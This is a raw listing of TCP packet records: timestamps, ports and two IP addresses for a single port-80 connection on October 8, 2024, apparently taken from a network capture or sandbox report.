Oct 8, 2024 20:47:31.935022116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935034037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935053110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935070038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935085058 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935118914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935297966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935331106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935352087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935364962 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935380936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935417891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935419083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935451031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935467958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935483932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935501099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935517073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935534000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935549974 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935568094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935584068 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935600042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935616970 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935633898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935648918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935667038 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935678005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935698032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935718060 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935796022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935806036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935813904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935826063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935836077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935847044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935857058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935858011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935868025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935878038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935889006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935899973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935914993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935915947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935925007 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935929060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935936928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.935945988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935971022 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935990095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.946311951 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.951189995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.305860043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.305898905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.305953979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.305985928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.305988073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306015015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306021929 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306037903 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306062937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306077957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306109905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306126118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306144953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306159019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306178093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306190968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306215048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306225061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306248903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306262016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306282043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306296110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306315899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306327105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306348085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306364059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306380987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306394100 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306413889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306427956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306449890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306459904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306497097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306624889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306658983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306674957 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306691885 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306704044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306723118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306740046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306756973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306768894 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306790113 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306802034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306823969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306835890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306857109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306869030 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306890011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306900978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306924105 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306938887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.306958914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.306967974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307003021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307137966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307172060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307178974 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307205915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307218075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307239056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307250977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307271957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307284117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307306051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307316065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307338953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307349920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307377100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307379961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307425976 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307434082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307467937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307482958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307502031 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307512999 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307534933 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307544947 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307568073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307578087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307600975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307610989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307635069 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307646036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307667971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307681084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307702065 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307712078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307734966 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307749987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.307770967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.307817936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308192968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308226109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308239937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308262110 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308271885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308295012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308305025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308335066 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308341026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308367968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308377981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308403015 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308412075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308434963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308445930 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308468103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308479071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308501005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308521032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308533907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308568001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308583021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308599949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308608055 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308634043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308646917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308667898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308679104 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308701038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308713913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308733940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308743954 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308768034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308789015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308801889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308810949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.308835983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.308881998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309052944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309087992 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309099913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309120893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309132099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309154034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309165955 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309189081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309199095 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309223890 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309237003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309257030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309257984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309290886 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309302092 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309324026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309334993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309357882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309369087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309391975 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309405088 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309425116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309434891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309457064 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309469938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309497118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309509993 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309525967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309544086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309561014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309568882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309595108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309606075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309628963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309639931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309662104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309673071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309695005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309706926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309730053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.309741020 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.309772015 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310095072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310138941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310147047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310179949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310192108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310214996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310225010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310254097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310265064 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310287952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310303926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310321093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310333967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310353994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310359001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310385942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310398102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310419083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310432911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310451984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310465097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310486078 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310494900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310518980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310527086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310551882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310559988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310585976 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310595989 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310620070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310628891 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310652971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310663939 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310686111 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310695887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310720921 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310735941 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310755014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310765982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310789108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310798883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310832977 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.310929060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310962915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.310976028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311005116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311059952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311094046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311108112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311127901 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311141968 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311160088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311172962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311192989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311227083 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311259985 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311269045 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311294079 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311292887 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311310053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311310053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311333895 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311367989 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311387062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311419964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311448097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311453104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311470032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311486959 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311503887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311521053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311534882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311553955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311567068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311588049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311597109 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311620951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.311631918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.311665058 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312026978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312063932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312088013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312107086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312114954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312148094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312163115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312180042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312213898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312228918 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312247038 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312262058 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312287092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312298059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312319994 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312323093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312357903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312391043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312411070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312423944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312448978 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312473059 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312477112 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312510967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312522888 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312542915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312552929 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312577009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:32.312589884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:32.312608957 CEST	80	49755	95.164.90.97	192.168.2.5
